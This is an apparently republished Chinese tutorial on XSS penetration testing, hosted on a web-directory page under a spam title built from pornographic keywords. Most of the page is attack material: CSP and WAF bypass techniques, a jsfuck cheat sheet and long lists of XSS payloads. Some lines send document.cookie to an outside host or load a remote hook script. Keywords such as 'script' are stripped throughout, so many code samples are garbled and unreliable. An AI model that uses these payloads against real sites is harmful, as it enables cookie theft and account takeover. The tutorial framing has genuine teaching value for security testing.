日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

國慶假期結束,這一節準備XSS跨站攻擊滲透測試中的利用點,上一節講了SQL注入攻擊的詳細流程,很多朋友想要咨詢具體在跨站攻擊上是如何實現和利用的,那么我們滲透測試工程師為大家詳細的講講這個XSS是如何實現以及原理。

XSS全稱為Cross Site ing,為了和css分開簡寫為XSS,中文名為跨站腳本。該漏洞發生在用戶端,是指在渲染過程中發生了不在預期過程中的JAVA代碼執行。XSS通常被用于獲取Cookie、以受攻擊者的身份進行操作等行為。

 

滲透測試XSS跨站攻擊檢測手法

 

 

3.2.1.1. 反射型XSS

反射型XSS是比較常見和廣泛的一類,舉例來說,當一個網站的代碼中包含類似下面的語句:<?php echo "<p>hello, $_GET['user']</p>";?> ,那么在訪問時設置 /?user=</p><>alert("hack")</><p> ,則可執行預設好的Java代碼。 反射型XSS通常出現在搜索等功能中,需要被攻擊者點擊對應的鏈接才能觸發,且受到XSS Auditor、No等防御手段的影響較大。

3.2.1.2. 儲存型XSS

儲存型XSS相比反射型來說危害較大,在這種漏洞中,攻擊者能夠把攻擊載荷存入服務器的數據庫中,造成持久化的攻擊。

3.2.1.3. DOM XSS

DOM型XSS不同之處在于DOM型XSS一般和服務器的解析響應沒有直接關系,而是在Java腳本動態執行的過程中產生的。

例如

<html>

<head>

<title>DOM Based XSS Demo</title>

<>

function xsstest()

{

var str = document.getElementById("input").value; document.getElementById("output").innerHTML = "<img src='"+str+"'></img>";

}

</>

</head>

<body>

<div id="output"></div>

<input type="text" id="input" size=50 value="" />

<input type="button" value="submit" onclick="xsstest()" /> </body>

</html>

輸入 x' ='java:alert(/xss/) 即可觸發。

3.2.1.4. Blind XSS

Blind XSS是儲存型XSS的一種,它保存在某些存儲中,當一個“受害者”訪問這個頁面時執行,并且在文檔對象模型(DOM)中呈現payload。它被歸類為盲目的原因是因為它通常發生在通常不暴露給用戶的功能上。

3.2.2. 同源策略

3.2.2.1. 簡介

 

滲透測試XSS跨站攻擊檢測手法

 

 

同源策略限制了不同源之間如何進行資源交互,是用于隔離潛在惡意文件的重要安全機制。是否同源由URL決定,URL由協議、域名、端口和路徑組成,如果兩個URL的協議、域名和端口相同,則表示他們同源。

3.2.2.1.1. file域的同源策略

在之前的瀏覽器中,任意兩個file域的URI被認為是同源的。本地磁盤上的任何HTML文件都可以讀取本地磁盤上的任何其他文件。

從Gecko 1.9開始,文件使用了更細致的同源策略,只有當源文件的父目錄是目標文件的祖先目錄時,文件才能讀取另一個文件。

3.2.2.1.2. cookie的同源策略

cookie使用不同的源定義方式,一個頁面可以為本域和任何父域設置cookie,只要是父域不是公共后綴(public suffix)即可。

不管使用哪個協議(HTTP/HTTPS)或端口號,瀏覽器都允許給定的域以及其任何子域名訪問cookie。設置 cookie時,可以使用 domain / path / secure 和 http-only 標記來限定其訪問性。

所以 https://localhost:8080/ 和 http://localhost:8081/ 的Cookie是共享的。

3.2.2.1.3. Flash/SilverLight跨域

瀏覽器的各種插件也存在跨域需求。通常是通過在服務器配置crossdomain.xml,設置本服務允許哪些域名的跨域訪問。

客戶端會請求此文件,如果發現自己的域名在訪問列表里,就發起真正的請求,否則不發送請求。

3.2.2.2. 源的更改

同源策略認為域和子域屬于不同的域,例如

域名1.a.com 與 域名a.com / 域名1.a.com 與 域名2.a.com/ xxx.域名1.a.com 與 域名1.a.com 兩兩不同源。

對于這種情況,可以在兩個方面各自設置 document.damain='a.com' 來改變其源來實現以上任意兩個頁面之間的通信。

另外因為瀏覽器單獨保存端口號,這種賦值會導致端口號被重寫為 null 。

3.2.2.3. 跨源訪問

同源策略控制了不同源之間的交互,這些交互通常分為三類:

  • 通常允許跨域寫操作(Cross-origin writes)
  • 鏈接(links)
  • 重定向
  • 表單提交
  • 通常允許跨域資源嵌入(Cross-origin embedding)
  • 通常不允許跨域讀操作(Cross-origin reads)

可能嵌入跨源的資源的一些示例有:

  • < src="..."></> 標簽嵌入跨域腳本。語法錯誤信息只能在同源腳本中捕捉到。
  • <link rel="stylesheet" href="..."> 標簽嵌入CSS。由于CSS的松散的語法規則,CSS的跨域需要一個設置正確的Content-Type 消息頭。
  • <img> / <video> / <audio> 嵌入多媒體資源。
  • <object> <embed> 和 <Applet> 的插件。
  • @font-face 引入的字體。一些瀏覽器允許跨域字體( cross-origin fonts),一些需要同源字體(same-origin fonts)。
  • <frame> 和 <iframe> 載入的任何資源。站點可以使用X-Frame-Options消息頭來阻止這種形式的跨域交互。

3.2.2.3.1. JSONP跨域

JSONP就是利用 <> 標簽的跨域能力實現跨域數據的訪問,請求動態生成的Java腳本同時帶一個callback函數名作為參數。

服務端收到請求后,動態生成腳本產生數據,并在代碼中以產生的數據為參數調用callback函數。

3.2.2.3.2. 跨源腳本API訪問

Java的APIs中,如 iframe.contentWindow , window.parent, window.open 和 window.opener 允許文檔間相互引用。當兩個文檔的源不同時,這些引用方式將對 window 和 location 對象的訪問添加限制。

window 允許跨源訪問的方法有

  • window.blur
  • window.close
  • window.focus
  • window.postMessage

window 允許跨源訪問的屬性有

  • window.closed
  • window.frames
  • window.length
  • window.location
  • window.opener
  • window.parent
  • window.self
  • window.top
  • window.window

其中 window.location 允許讀/寫,其他的屬性只允許讀

3.2.2.3.3. 跨源數據存儲訪問

存儲在瀏覽器中的數據,如 localStorage 和 IndexedDB,以源進行分割。每個源都擁有自己單獨的存儲空間,一個源中的Java腳本不能對屬于其它源的數據進行讀寫操作。

3.2.2.4. CORS

CORS是一個W3C標準,全稱是”跨域資源共享”(Cross-origin resource sharing)。通過這個標準,可以允許瀏覽器讀取跨域的資源。

3.2.2.4.1. 常見返回頭

  • Access-Control-Allow-Origin
  • 聲明允許的源
  • Access-Control-Allow-Origin: <origin> | *
  • Access-Control-Expose-Headers
  • 聲明允許暴露的頭 e.g. Access-Control-Expose-Headers: X-My-Custom-Header,X-Another-Custom-Header
  • Access-Control-Max-Age
  • 聲明Cache時間
  • Access-Control-Max-Age: <delta-seconds>
  • Access-Control-Allow-Credentials
  • 聲明是否允許在請求中帶入
  • Access-Control-Allow-Credentials: true
  • Access-Control-Allow-Methods
  • 聲明允許的訪問方式
  • Access-Control-Allow-Methods: <method>[, <method>]*
  • Access-Control-Allow-Headers
  • 聲明允許的頭
  • Access-Control-Allow-Headers: <field-name>[, <field-name>]*

3.2.2.4.2. 常見請求頭

  • Origin
  • 指定請求的源
  • Origin: <origin>
  • Access-Control-Request-Method
  • 聲明請求使用的方法
  • Access-Control-Request-Method: <method>
  • Access-Control-Request-Headers
  • 聲明請求使用的header
  • Access-Control-Request-Headers: <field-name>[, <field-name>]*

3.2.2.4.3. 防御建議

 

滲透測試XSS跨站攻擊檢測手法

 

 

如非必要不開啟CORS

  • 定義詳細的白名單,不使用通配符,僅配置所需要的頭
  • 配置 Vary: Origin 頭部
  • 如非必要不使用 Access-Control-Allow-Credentials
  • 限制緩存的時間

3.2.2.5. 阻止跨源訪問

阻止跨域寫操作,可以檢測請求中的 CSRF token ,這個標記被稱為Cross-Site Request Forgery (CSRF) 標記。

阻止資源的跨站讀取,因為嵌入資源通常會暴露信息,需要保證資源是不可嵌入的。但是多數情況下瀏覽器都不會遵守 Content-Type 消息頭。例如如果在HTML文檔中指定 <> 標記,則瀏覽器會嘗試將HTML解析為Java。

3.2.3. CSP

3.2.3.1. CSP是什么?

Content Security Policy,簡稱 CSP。顧名思義,這個規范與內容安全有關,主要是用來定義頁面可以加載哪些資源,減少 XSS 的發生。

3.2.3.2. 配置

CSP策略可以通過 HTTP 頭信息或者 meta 元素定義。

CSP 有三類:

  • Content-Security-Policy (google Chrome)
  • X-Content-Security-Policy (Firefox)
  • X-WebKit-CSP (WebKit-based browsers, e.g. Safari)

HTTP header :

"Content-Security-Policy:" 策略

"Content-Security-Policy-Report-Only:" 策略

HTTP Content-Security-Policy 頭可以指定一個或多個資源是安全的,而Content-Security-Policy-Report-Only則是允許服務器檢查(非強制)一個策略。多個頭的策略定義由優先采用最先定義的。

HTML Meta :

<meta http-equiv="content-security-policy" content="策略">

<meta http-equiv="content-security-policy-report-only" content="策略">

3.2.3.2.1. 指令說明

3.2.3.2.2. 關鍵字

  • -
  • 允許從任意url加載,除了 data: blob: filesystem: schemes
  • e.g. img-src -
  • none
  • 禁止從任何url加載資源
  • e.g. object-src 'none'
  • self
  • 只可以加載同源資源
  • e.g. img-src 'self'
  • data:
  • 可以通過data協議加載資源
  • e.g. img-src 'self' data:
  • domain.example.com
  • e.g. img-src domain.example.com
  • 只可以從特定的域加載資源
  • *.example.com
  • e.g. img-src *.example.com
  • 可以從任意域名.com的子域處加載資源
  • https://cdn.com
  • e.g. img-src https://域名.com
  • 只能從給定的域用https加載資源
  • https:
  • e.g. img-src https:
  • 只能從任意域用https加載資源
  • unsafe-inline
  • 允許內部資源執行代碼例如style attribute,onclick或者是sicript標簽
  • e.g. -src 'unsafe-inline'
  • unsafe-eval
  • 允許一些不安全的代碼執行方式,例如js的eval()
  • e.g. -src 'unsafe-eval'
  • nonce-<-value>'
  • 使用隨機的nonce,允許加載標簽上nonce屬性匹配的標簽
  • e.g. -src 'nonce-bm9uY2U='
  • <hash-algo>-<-value>'
  • 允許hash值匹配的代碼塊被執行
  • e.g. -src 'sha256-<-value>'

3.2.3.2.3. 配置范例

允許執行內聯 JS 代碼,但不允許加載外部資源

Content-Security-Policy: default-src 'self'; -src 'self' 'unsafe-inline';

3.2.3.3. Bypass

3.2.3.3.1. 預加載

瀏覽器為了增強用戶體驗,讓瀏覽器更有效率,就有一個預加載的功能,大體是利用瀏覽器空閑時間去加載指定的內容,然后緩存起來。這個技術又細分為DNS-prefetch、subresource、prefetch、preconnect、prerender。

HTML5頁面預加載是用link標簽的rel屬性來指定的。如果csp頭有unsafe-inline,則用預加載的方式可以向外界發出請求,例如

<!-- 預加載某個頁面 -->

<link rel='prefetch' href='http://xxxx'><!-- firefox -->

<link rel='prerender' href='http://xxxx'><!-- chrome -->

<!-- 預加載某個圖片 -->

<link rel='prefetch' href='http://xxxx/x.jpg'>

<!-- DNS 預解析 -->

<link rel="dns-prefetch" href="http://xxxx">

<!-- 特定文件類型預加載 -->

<link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->

另外,不是所有的頁面都能夠被預加載,當資源類型如下時,講阻止預加載操作:

  • URL中包含下載資源
  • 頁面中包含音頻、視頻
  • POST、PUT和DELET操作的ajax請求
  • HTTP認證
  • HTTPS頁面
  • 含惡意軟件的頁面
  • 彈窗頁面
  • 占用資源很多的頁面
  • 打開了chrome developer tools開發工具

3.2.3.3.2. MIME Sniff

舉例來說,csp禁止跨站讀取腳本,但是可以跨站讀img,那么傳一個含有腳本的img,再“< href=’http://xxx.com/xx.jpg’>“,這里csp認為是一個img,繞過了檢查,如果網站沒有回正確的mime type,瀏覽器會進行猜測,就可能加載該img作為腳本

3.2.3.3.3. 302跳轉

對于302跳轉繞過CSP而言,實際上有以下幾點限制:

  • 跳板必須在允許的域內。
  • 要加載的文件的host部分必須跟允許的域的host部分一致

3.2.3.3.4. iframe

當可以執行代碼時,可以創建一個源為 css js 等靜態文件的frame,在配置不當時,該frame并不存在csp,則在該frame下再次創建frame,達到bypass的目的。同理,使用 ../../../ /%2e%2e%2f等可能觸發服務器報錯的鏈接也可以到達相應的目的。

3.2.3.3.5. 其他

  • CND Bypass,如果網站信任了某個CDN, 那么可利用相應的CDN bypass
  • Angular versions <1.5.9 >=1.5.0,存在漏洞 Git Pull Request
  • jQuery sourcemap
  • document.write(`<> //@ sourceMappingURL=http://xxxx/`+document.cookie+`</>`);``
  • a標簽的ping屬性
  • For FireFox <META HTTP-EQUIV="refresh" CONTENT="0; url=data:text/html;,PHNjcmlwdD5hbGVydCgnSWhhdmVZb3VOb3cnKTs8L3NjcmlwdD4=">
  • <link rel="import" />
  • <meta http-equiv="refresh" content="0; url=http://...." />
  • 當-src為nonce或無限制,且base-uri無限制時,可通過 base 標簽修改根URL來bypass,如下加載了http://evil.com/main.js
  • <base href="http://evil.com/">
  • < nonce="correct value" src="/main.js"></>

3.2.4. XSS數據源

3.2.4.1. URL

  • location
  • location.href
  • location.pathname
  • location.search
  • location.hash
  • document.URL
  • document.documentURI
  • document.baseURI

3.2.4.2. Navigation

  • window.name
  • document.referrer

3.2.4.3. Communication

  • Ajax
  • Fetch
  • WebSocket
  • PostMessage

3.2.4.4. Storage

  • Cookie
  • LocalStorage
  • SessionStorage

3.2.5. Sink

3.2.5.1. 執行Js

  • eval(payload)
  • setTimeout(payload, 100)
  • setInterval(payload, 100)
  • Function(payload)()
  • <>payload</>
  • <img src=x =payload>

3.2.5.2. 加載URL

  • location=java:alert(/xss/)
  • location.href=java:alert(/xss/)
  • location.assign(java:alert(/xss/))
  • location.replace(java:alert(/xss/))

3.2.5.3. 執行HTML

  • xx.innerHTML=payload
  • xx.outerHTML=payload
  • document.write(payload)
  • document.writeln(payload)

3.2.6. XSS保護

3.2.6.1. HTML過濾

使用一些白名單或者黑名單來過濾用戶輸入的HTML,以實現過濾的效果。例如DOMPurify等工具都是用該方式實現了XSS的保護。

3.2.6.2. X-Frame

X-Frame-Options 響應頭有三個可選的值:

  • DENY
  • 頁面不能被嵌入到任何iframe或frame中
  • SAMEORIGIN
  • 頁面只能被本站頁面嵌入到iframe或者frame中
  • ALLOW-FROM
  • 頁面允許frame或frame加載

3.2.6.3. XSS保護頭

基于 Webkit 內核的瀏覽器(比如Chrome)有一個名為XSS auditor的防護機制,如果瀏覽器檢測到了含有惡意代碼的輸入被呈現在HTML文檔中,那么這段呈現的惡意代碼要么被刪除,要么被轉義,惡意代碼不會被正常的渲染出來。

而瀏覽器是否要攔截這段惡意代碼取決于瀏覽器的XSS防護設置。

要設置瀏覽器的防護機制,則可使用X-XSS-Protection字段 該字段有三個可選的值

0: 表示關閉瀏覽器的XSS防護機制

1: 刪除檢測到的惡意代碼, 如果響應報文中沒有看到X-XSS-Protection 字段,那么瀏覽器就認為X-XSS-Protection配置為1,這是瀏覽器的默認設置

1; mode=block: 如果檢測到惡意代碼,在不渲染惡意代碼

FireFox沒有相關的保護機制,如果需要保護,可使用No等相關插件。

3.2.7. WAF Bypass

  • 利用<>標記
  • 利用html屬性
  • href
  • lowsrc
  • bgsound
  • background
  • value
  • action
  • dynsrc
  • 關鍵字
  • 利用回車拆分
  • 字符串拼接(window["al" + "ert"])
  • 利用編碼繞過
  • jsfuck
  • String.fromCharCode
  • HTML
  • URL
  • hex(window["\x61\x6c\x65\x72\x74"])
  • unicode
  • utf7(+ADw-+AD4-alert('XSS')+ADsAPA-/+AD4-)
  • utf16
  • 大小寫混淆
  • 對標簽屬性值轉碼
  • 產生事件
  • css跨站解析
  • 長度限制bypass
  • eval(name)
  • eval(hash)
  • import
  • $.get
  • $.get
  • .
  • 使用 。繞過IP/域名
  • document['cookie'] 繞過屬性取值
  • 過濾引號用 “ ` “ 繞過

3.2.8.1. CSS 注入

CSS注入最早開始于利用CSS中的 expression() url() regex() 等函數或特性來引入外部的惡意代碼,但是隨著瀏覽器的發展,這種方式被逐漸禁用,與此同時,出現了一些新的攻擊方式。

3.2.8.1.2. CSS selectors

利用CSS selectors完成攻擊的一個示例

3.2.8.1.3. Abusing Unicode Range

當可以插入CSS的時候,可以使用 font-face 配合 unicode-range 獲取目標網頁對應字符集。PoC如下

 

滲透測試XSS跨站攻擊檢測手法

 

 

當字符較多時,則可以結合%20::first-line%20等CSS屬性縮小范圍,以獲取更精確的內容

3.2.8.2.%20Bypass%20Via%20Gadgets

3.2.8.2.1.%20簡介

 

 

 

一些網站會使用白名單或者一些基于DOM的防御方式,對這些方式,有一種被稱為 Code Reuse 的攻擊方式可以繞過。該方式和二進制攻防中的Gadget相似,使用目標中的合法代碼來達到繞過防御措施的目的。在論文 Code-Reuse Attacks for the Web: Breaking Cross-Site ing Mitigations via Gadgets 中有該方法的具體描述。

下面有一個簡單的例子,這個例子使用了 DOMPurify 來加固,但是因為引入了 jquery.mobile.js 導致可以被攻擊。

3.2.8.2.2. 例子

// index.php

<?php

$msg = $_GET['message'];

$msg = str_replace("n", "",

$msg); $msg = _encode($msg);

?>

<!DOCTYPE html>

<html lang="en">

<head>

<meta charset="UTF-8">

<title>Preview</title>

< type="text/java" src="purify.js"></>

< type="text/java" src="jquery.js"></>

< type="text/java" src="jquery.mobile.js"></>

</head>

<body>

< type="text/java">

var d= atob('<?php echo $msg; ?>');

var cleanvar = DOMPurify.sanitize(d);

document.write(cleanvar);

</>

</body>

</html>

// playload

<div data-role=popup id='-->

<>alert(1)</>'>

</div>

3.2.8.3. jsfuck cheat sheet

3.2.8.3.1. Basic values

  • undefined > [][[]]
  • false > ![]
  • true > !![]
  • NaN > +[![]]
  • 0 > +[]
  • 1 > +!+[]
  • 2 > !+[]+!+[]

3.2.8.3.2. Basic strings

  • '' > []+[]
  • 'undefined' > []+[][[]]
  • 'false' > []+![]
  • 'true' > []+!![]
  • 'NaN' > []+(+[![]])
  • '0' > []+(+[])
  • '1' > []+(+!+[])
  • '2' > []+(!+[]+!+[])
  • '10' > [+!+[]]+[+[]]
  • '11' > [+!+[]]+[+!+[]]
  • '100' > [+!+[]]+[+[]]+(+[])

3.2.8.3.3. Higher numbers

  • 10 > +([+!+[]]+[+[]])
  • 11 > +([+!+[]]+[+!+[]])
  • 100 > +([+!+[]]+[+[]]+(+[]))

3.2.8.3.4. String alphabet

  • 'a' > ([]+![])[+!+[]]
  • 'd' > ([]+[][[]])[+!+[]+!+[]]
  • 'e' > ([]+!+[])[+!+[]+!+[]+!+[]]
  • 'f' > ([]+![])[+[]]
  • 'i' > ([]+[][[]])[+!+[]+!+[]+!+[]+!+[]+!+[]]
  • 'l' > ([]+![])[+!+[]+!+[]]
  • 'n' > ([]+[][[]])[+!+[]]
  • 'r' > ([]+!+[])[+!+[]]
  • 's' > ([]+![])[+!+[]+!+[]+!+[]]
  • 't' > ([]+!+[])[+[]]
  • 'u' > ([]+!+[])[+!+[]+!+[]]

3.2.8.4. RPO(Relative Path Overwrite)

RPO(Relative Path Overwrite) 攻擊又稱為相對路徑覆蓋攻擊,依賴于瀏覽器和網絡服務器的反應,利用服務器的 Web 緩存技術和配置差異。

3.2.9. Payload

3.2.9.1. 常用

  • <>alert(/xss/)</>
  • <svg =alert(document.domain)>
  • <img src=document.domain =alert(document.domain)>
  • <M onmouseover=alert(document.domain)>M
  • <marquee onscroll=alert(document.domain)>
  • <a href=java:alert(document.domain)>M</a>
  • <body =alert(document.domain)>
  • <details open ontoggle=alert(document.domain)>
  • <embed src=java:alert(document.domain)>

3.2.9.2. 大小寫繞過

  • <>alert(1)</>
  • <>alert(1)</>
  • <>alert(1)</>
  • <>alert(1)</>
  • <>alert(1)</>
  • <img src=1 =alert(1)>
  • <iMg src=1 =alert(1)>
  • <ImG src=1 =alert(1)>
  • <img src=1 ="alert("M")">
  • <marquee onscroll=alert(1)>
  • <mArQuEe OnScRoLl=alert(1)>
  • <MaRqUeE oNsCrOlL=alert(1)>

3.2.9.3. 各種alert

  • <>alert(1)</>
  • <>confirm(1)</>
  • <>prompt(1)</>
  • <>alert('1')</>
  • <>alert("1")</>
  • <>alert`1`</>
  • <>(alert)(1)</>
  • <>a=alert,a(1)</>
  • <>[1].find(alert)</>
  • <>top["al"+"ert"](1)</>
  • <>top["a"+"l"+"e"+"r"+"t"](1)</>
  • <>top[/al/.source+/ert/.source](1)</>
  • <>top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1)</>

3.2.9.4. 偽協議

  • <a href=java:/0/,alert(%22M%22)>M</a>
  • <a href=java:/00/,alert(%22M%22)>M</a>
  • <a href=java:/000/,alert(%22M%22)>M</a>
  • <a href=java:/M/,alert(%22M%22)>M</a>

3.2.9.5. Chrome XSS auditor bypass

  • ?param=https://&param=@z.exeye.io/import%20rel=import%3E
  • <base href=java:/M/><a href=,alert(1)>M</a>
  • <base href=java:/M/><iframe src=,alert(1)></iframe>

3.2.9.6. 長度限制

<>s+="l"</>

...

<>eval(s)</>

3.2.9.7. jquery sourceMappingURL

</textarea><>var

a=1//@ sourceMappingURL=//xss.site</>

3.2.9.8. 圖片名

"><img src=x =alert(document.cookie)>.gif

3.2.9.9. 過期的payload

  • src=java:alert基本不可以用
  • css expression特性只在舊版本ie可用

3.2.9.10. css

<div style="background-image:url(java:alert(/xss/))">

<STYLE>@import'域名/xss.css';</STYLE>

3.2.9.11. markdown

  • [a](java:prompt(document.cookie))
  • [a](j a v a s c r i p t:prompt(document.cookie)) <JavaScript:alert('XSS')>
  • ![a'"`=prompt(document.cookie)](x)
  • [notmalicious](java:window.=alert;throw%20document.cookie)
  • [a](data:text/html;,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
  • ![a](data:text/html;,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)

3.2.9.12. iframe

<iframe ='

var sc = document.("scr" + "ipt");

sc.type = "text/javascr" + "ipt";

sc.src = "域名/js/hook.js"; document.body.(sc);

'

/>

  • <iframe src=java:alert(1)></iframe>
  • <iframe src="data:text/html,<iframe src=java:alert('M')></iframe>"></iframe>
  • <iframe src=data:text/html;,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
  • <iframe srcdoc=<svg/onload&equals;alert&lpar;1)>></iframe>
  • <iframe src=https://baidu.com width=1366 height=768></iframe>
  • <iframe src=java:alert(1) width=1366 height=768></iframe

3.2.9.13. form

  • <form action=java:alert(1)><input type=submit>
  • <form><button formaction=java:alert(1)>M
  • <form><input formaction=java:alert(1) type=submit value=M>
  • <form><input formaction=java:alert(1) type=image value=M>
  • <form><input formaction=java:alert(1) type=image src=1>

3.2.9.14. meta

<META HTTP-EQUIV="Link" Content="<域名/xss.css>; REL=stylesheet">

3.2.10. 持久化

3.2.10.1. 基于存儲

有時候網站會將信息存儲在Cookie或localStorage,而因為這些數據一般是網站主動存儲的,很多時候沒有對Cookie或localStorage中取出的數據做過濾,會直接將其取出并展示在頁面中,甚至存了JSON格式的數據時,部分站點存在 eval(data) 之類的調用。因此當有一個XSS時,可以把payload寫入其中,在對應條件下觸發。

在一些條件下,這種利用方式可能因為一些特殊字符造成問題,可以使用 String.fromCharCode 來繞過。

3.2.10.2. Service Worker

Service Worker可以攔截http請求,起到類似本地代理的作用,故可以使用Service Worker Hook一些請求,在請求中返回攻擊代碼,以實現持久化攻擊的目的。

在Chrome中,可通過 chrome://inspect/#service-workers 來查看Service Worker的狀態,并進行停止。

3.2.10.3. AppCache

在可控的網絡環境下(公共wifi),可以使用AppCache機制,來強制存儲一些Payload,未清除的情況下,用戶訪問站點時對應的payload會一直存在。這節講了這么多關于滲透測試中XSS跨站攻擊的檢測方法,如果對此有需求的朋友可以聯系專業的網站安全公司來處理解決防患于未然等等。

分享到:
標簽:攻擊 XSS
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定